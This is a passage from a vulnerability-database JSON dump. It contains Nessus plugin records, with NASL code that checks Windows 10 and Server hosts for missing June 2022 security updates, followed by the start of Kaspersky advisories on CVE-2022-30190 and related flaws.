CVE-2022-30153, CVE-2022-30161)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014702: Windows 10 Version 1607 and Windows Server 2016 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30131", "CVE-2022-30136", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014702.NASL", "href": "https://www.tenable.com/plugins/nessus/162196", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162196);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/13\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30131\",\n \"CVE-2022-30136\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30148\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014702\");\n script_xref(name:\"MSFT\", value:\"MS22-5014702\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014702: Windows 10 Version 1607 and Windows Server 2016 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014702. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014702\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014702\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30136\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014702'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014702])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-13T18:50:10", "description": "The remote Windows host is missing security update 5014692. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014692: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30131", "CVE-2022-30132", "CVE-2022-30136", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014692.NASL", "href": "https://www.tenable.com/plugins/nessus/162197", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162197);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/13\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30131\",\n \"CVE-2022-30132\",\n \"CVE-2022-30136\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30148\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014692\");\n script_xref(name:\"MSFT\", value:\"MS22-5014692\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014692: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014692. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014692\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014692\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30136\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014692'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014692])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-16T17:48:50", "description": "The remote Windows host is missing security update 5014699. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-30166, CVE-2022-30165, CVE-2022-30160 CVE-2022-30154, CVE-2022-30151, CVE-2022-30150, CVE-2022-30147, CVE-2022-30132, CVE-2022-30131)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2022-30164) \n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-30163, CVE-2022-30161, CVE-2022-30153, CVE-2022-30149, CVE-2022-30146, CVE-2022-30145, CVE-2022-30143, CVE-2022-30142, CVE-2022-30141, CVE-2022-30140, CVE-2022-30139,CVE-2022-30190)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014699: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30131", "CVE-2022-30132", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30189", "CVE-2022-30190", "CVE-2022-32230"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014699.NASL", "href": "https://www.tenable.com/plugins/nessus/162201", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162201);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30132\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30148\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30189\",\n \"CVE-2022-30190\",\n \"CVE-2022-32230\"\n );\n script_xref(name:\"MSKB\", value:\"5014699\");\n script_xref(name:\"MSFT\", value:\"MS22-5014699\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014699: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014699. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. \n (CVE-2022-30166, CVE-2022-30165, CVE-2022-30160 CVE-2022-30154, CVE-2022-30151, CVE-2022-30150, \n CVE-2022-30147, CVE-2022-30132, CVE-2022-30131)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature \n and perform unauthorized actions compromising the integrity of the system/application. (CVE-2022-30164)\n \n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands. (CVE-2022-30163, CVE-2022-30161, CVE-2022-30153, CVE-2022-30149,\n CVE-2022-30146, CVE-2022-30145, CVE-2022-30143, CVE-2022-30142, CVE-2022-30141, CVE-2022-30140,\n CVE-2022-30139,CVE-2022-30190)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014699\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014699\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30165\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014699'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nos_name = get_kb_item(\"SMB/ProductName\");\n\nif (\n ( (\"enterprise\" >< tolower(os_name) || \"education\" >< tolower(os_name))\n &&\n smb_check_rollup(os:'10',\n os_build:19042,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014699]) )\n ||\n smb_check_rollup(os:'10',\n os_build:19043,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014699])\n || \n smb_check_rollup(os:'10',\n os_build:19044,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014699])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-06-15T11:57:17", "description": "### *Detect date*:\n05/30/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Products (Extended Security Update). Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Windows Support Diagnostic Tool (MSDT)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5014742](<http://support.microsoft.com/kb/5014742>) \n[5014748](<http://support.microsoft.com/kb/5014748>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T00:00:00", "type": "kaspersky", "title": "KLA12550 RCE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T00:00:00", "id": "KLA12550", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12550/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T11:57:17", "description": "### *Detect date*:\n05/30/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1809 